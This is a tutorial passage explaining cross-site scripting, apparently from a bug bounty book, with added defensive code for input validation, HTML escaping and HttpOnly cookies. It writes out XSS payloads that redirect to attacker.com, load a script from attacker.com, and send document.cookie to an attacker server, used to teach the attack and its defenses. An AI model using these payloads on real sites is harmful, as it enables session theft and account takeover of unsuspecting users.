
Mechanisms

Published 2024-10-11 20:33:56 · 11698 characters · 0 views · 0 comments · 0 favorites

In an XSS attack, the attacker injects an executable script into HTML pages viewed by the user. This means that to understand XSS, you’ll have to first understand JavaScript and HTML syntax.


Web pages are made up of HTML code whose elements describe the page’s structure and contents. For example, an <h1> tag defines a web page’s header, and a <p> tag represents a paragraph of text. The tags use corresponding closing tags, like </h1> and </p>, to indicate where the contents of the element should end. To see how this works, save this code in a file named test.html:


<html>
  <h1>Welcome to my web page.</h1>
  <p>Thanks for visiting!</p>
</html>

Now open it with your web browser. You can do this by right-clicking the HTML file, clicking Open With, and then selecting your preferred web browser, like Google Chrome, Mozilla Firefox, or Microsoft Internet Explorer. Or you can simply open your web browser and drag the HTML file into the browser window. You should see a simple web page like Figure 6-1.


Figure 6-1: Our simple HTML page rendered in a browser

In addition to formatting text, HTML lets you embed images with <img> tags, create user-input forms with <form> tags, link to external pages with <a> tags, and perform many other tasks. A full tutorial on how to write HTML code is beyond the scope of this chapter, but you can use W3Schools’ tutorial (https://www.w3schools.com/html/default.asp) as a resource.


HTML also allows the inclusion of executable scripts within HTML documents using <script> tags. Websites use these scripts to control client-side application logic and make the website interactive. For example, the following script generates a Hello! pop-up on the web page:


<html>
  <script>alert("Hello!");</script>
  <h1>Welcome to my web page!</h1>
  <p>Thanks for visiting!</p>
</html>

Scripts like this one that are embedded within an HTML file instead of loaded from a separate file are called inline scripts. These scripts are the cause of many XSS vulnerabilities. (Besides embedding a script inside the HTML page as an inline script, sites can also load JavaScript code as an external file, like this: <script src="URL_OF_EXTERNAL_SCRIPT"></script>.)


To see why, let’s say that our site contains an HTML form that allows visitors to subscribe to a newsletter (Figure 6-2).


Figure 6-2: Our HTML page with an HTML form

The source HTML code of the page looks like this:


<h1>Welcome to my site.</h1>
<h3>This is a cybersecurity newsletter that focuses on bug bounty
news and write-ups. Please subscribe to my newsletter below to
receive new cybersecurity articles in your email inbox.</h3>
<form action="/subscribe" method="post">
  <label for="email">Email:</label><br>
  <input type="text" id="email" value="Please enter your email.">
  <br><br>
  <input type="submit" value="Submit">
</form>

After a visitor inputs an email address, the website confirms it by displaying it on the screen (Figure 6-3).


Figure 6-3: The confirmation message after a visitor subscribes to our newsletter

The HTML that generates the confirmation message looks like this; HTML <b> tags indicate boldface text:


<p>Thanks! You have subscribed <b>vickie@gmail.com</b> to the newsletter.</p>

The page constructs the message by using user input. Now, what if a user decides to input a script instead of an email address in the email form? For instance, a script that sets the location of a web page will make the browser redirect to the location specified:


<script>location="http://attacker.com";</script>

The attacker could enter this script into the email form field and click Submit (Figure 6-4).


Figure 6-4: An attacker can enter a script instead of an email in the input field.

If the website doesn’t validate or sanitize the user input before constructing the confirmation message, the page source code would become the following:


<p>Thanks! You have subscribed <b><script>location="http://attacker.com";</script></b> to the newsletter.</p>

Validating user input means that the application checks that the user input meets a certain standard—in this case, does not contain malicious JavaScript code. Sanitizing user input, on the other hand, means that the application modifies special characters in the input that can be used to interfere with HTML logic before further processing.
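The two defenses just defined, validation and sanitization, are easiest to see side by side. The following is an added example written for this page (it is not the book's code): the newsletter confirmation rendered first by plain string concatenation, as the vulnerable site does, and then by a version that rejects input that is not an email address and HTML-escapes whatever it does render. The names (escapeHtml, isValidEmail, renderConfirmationVulnerable, renderConfirmationSafe, containsScriptTag) and the simple email pattern are this example's own choices; the sample inputs are the chapter's email address and its redirect payload.

```javascript
// Added example (not from the book): the newsletter confirmation page,
// rendered first the vulnerable way and then with validation + escaping.

// Sanitization: escape the five characters that can change HTML structure
// when user input lands inside element content or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Validation: accept only input that looks like a single email address.
// The pattern is a deliberate simplification for this example, not an
// RFC 5322 parser; its job here is to reject anything that carries markup.
const EMAIL_PATTERN = /^[^\s@<>"']+@[^\s@<>"']+\.[^\s@<>"']+$/;
function isValidEmail(value) {
  return EMAIL_PATTERN.test(String(value));
}

// Vulnerable: the confirmation is built by string concatenation, exactly as
// the chapter describes. Whatever the visitor typed becomes part of the page.
function renderConfirmationVulnerable(email) {
  return `<p>Thanks! You have subscribed <b>${email}</b> to the newsletter.</p>`;
}

// Hardened: reject input that is not an email, and HTML-escape it before it
// is placed in the page, so the browser treats it as text, never as markup.
function renderConfirmationSafe(email) {
  if (!isValidEmail(email)) {
    return "<p>That does not look like an email address. Please try again.</p>";
  }
  return `<p>Thanks! You have subscribed <b>${escapeHtml(email)}</b> to the newsletter.</p>`;
}

// A check a reviewer can run over rendered output: did a <script> element
// appear in a slot where only text was expected?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed inputs: the chapter's legitimate address and its redirect payload.
const SAMPLE_EMAIL = "vickie@gmail.com";
const SAMPLE_PAYLOAD = '<script>location="http://attacker.com";</script>';

console.log(renderConfirmationVulnerable(SAMPLE_PAYLOAD)); // the script is now part of the page
console.log(renderConfirmationSafe(SAMPLE_PAYLOAD));       // rejected by validation
console.log(renderConfirmationSafe(SAMPLE_EMAIL));         // rendered as plain text
```

Escaping is applied at the point where the value is written into HTML, not when it is received, because the same value may later be placed in a different context (a JavaScript string, a URL) that needs a different encoding. Validation is the first gate; escaping is what still protects the page when validation lets something unexpected through.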


As a result, the inline script would cause the page to redirect to attacker.com. XSS happens when attackers can inject scripts in this manner onto a page that another user is viewing. The attacker can also use a different syntax to embed malicious code. The src attribute of the HTML <script> tag allows you to load JavaScript from an external source. This piece of malicious code will execute the contents of http://attacker.com/xss.js/ on the victim’s browser during an XSS attack:


<script src=http://attacker.com/xss.js></script>

This example isn’t really exploitable, because attackers have no way of injecting the malicious script on other users’ pages. The most they could do is redirect themselves to the malicious page. But let’s say that the site also allows users to subscribe to the newsletter by visiting the URL https://subscribe.example.com?email=SUBSCRIBER_EMAIL. After users visit the URL, they will be automatically subscribed, and the same confirmation will be shown on the web page. In this case, attackers can inject the script by tricking users into visiting a malicious URL:


https://subscribe.example.com?email=<script>location="http://attacker.com";</script>

Since the malicious script gets incorporated into the page, the victim’s browser will think the script is part of that site. Then the injected script can access any resources that the browser stores for that site, including cookies and session tokens. Attackers can, therefore, use these scripts to steal information and bypass access control. For example, attackers might steal user cookies by making the victim’s browser send a request to the attacker’s IP with the victim’s cookie as a URL parameter:


<script>image = new Image();
image.src='http://attacker_server_ip/?c='+document.cookie;</script>

This script contains JavaScript code to load an image from the attacker’s server, with the user’s cookies as part of the request. The browser will send a GET request to the attacker’s IP, with the URL parameter c (for cookie) containing the user’s document.cookie, which is the victim user’s cookie on the current site. In this way, attackers can use the XSS to steal other users’ cookies by inspecting incoming requests on their server logs. Note that if the session cookie has the HttpOnly flag set, JavaScript will not be able to read the cookie, and therefore the attacker will not be able to exfiltrate it. Nevertheless, XSS can be used to execute actions on the victim’s behalf, modify the web page the victim is viewing, and read the victim’s sensitive information, such as CSRF tokens, credit card numbers, and any other details rendered on their page.
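The HttpOnly point above is worth seeing concretely. The following is an added example written for this page (not the book's code): a small model of a browser cookie jar that parses Set-Cookie headers and computes what document.cookie would expose, then compares a session cookie issued without HttpOnly against one issued with it. The helper names (parseSetCookie, documentCookie, sessionCookieHeader, leakedToScript), the token value, and the Secure and SameSite=Lax defaults are this example's assumptions; the only thing taken from the chapter is the shape of the exfiltration URL.

```javascript
// Added example (not from the book): why HttpOnly keeps the session cookie
// out of reach of a script injected into the page.

// Parse one Set-Cookie header value into { name, value, httpOnly }.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  return {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    httpOnly: attrs.some((a) => a.toLowerCase() === "httponly"),
  };
}

// What document.cookie returns for this jar: every cookie that is NOT
// HttpOnly, joined as "name=value; name2=value2". HttpOnly cookies are still
// sent on requests; they are simply invisible to page script.
function documentCookie(jar) {
  return jar
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Build the Set-Cookie value for a session cookie. HttpOnly is on by default;
// Secure and SameSite=Lax are sensible companions chosen for this example.
function sessionCookieHeader(token, { httpOnly = true } = {}) {
  const attrs = ["Path=/", "Secure", "SameSite=Lax"];
  if (httpOnly) attrs.push("HttpOnly");
  return `session=${token}; ${attrs.join("; ")}`;
}

// The string the chapter's payload ('?c=' + document.cookie) would carry to
// the attacker's server for a given jar.
function leakedToScript(jar) {
  return "http://attacker_server_ip/?c=" + encodeURIComponent(documentCookie(jar));
}

// Constructed jars: a site that forgot HttpOnly, and one that set it.
const TOKEN = "constructed-session-token";
const weakJar = [
  parseSetCookie(sessionCookieHeader(TOKEN, { httpOnly: false })),
  parseSetCookie("theme=dark; Path=/"),
];
const hardenedJar = [
  parseSetCookie(sessionCookieHeader(TOKEN)),
  parseSetCookie("theme=dark; Path=/"),
];

console.log(leakedToScript(weakJar));     // session token is in the request
console.log(leakedToScript(hardenedJar)); // only the harmless theme cookie
```

HttpOnly narrows what a successful injection can steal; it does not stop the injected script from making authenticated requests from the victim's browser, which is why the chapter still lists actions on the victim's behalf and on-page data as reachable.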

